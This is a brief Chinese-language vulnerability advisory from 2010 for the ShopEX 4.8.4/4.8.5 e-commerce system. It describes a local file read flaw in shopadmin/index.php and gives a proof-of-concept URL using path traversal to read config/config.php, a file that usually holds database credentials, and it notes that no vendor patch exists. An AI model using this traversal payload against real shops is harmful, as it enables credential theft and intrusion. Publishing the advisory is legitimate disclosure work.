添加时间:
2010-06-18

系统编号:
WAVDB-01655

影响版本:
ShopEX 4.8.5/4.8.4

程序介绍:

ShopEX网上商店系统是国内最大的电子商务系统程序

漏洞分析:

因程序当中的index.php在对参数的处理过程中存在本地文件读取漏洞，导致恶意用户可以通过提交相关进行攻击

漏洞利用:

http://wavdb.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

解决方案:
厂商补丁：
ShopEX
------------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.shopex.cn/index.html

信息来源:
<*来源: isbx's Blog
链接: http://hi.baidu.com/isbx*>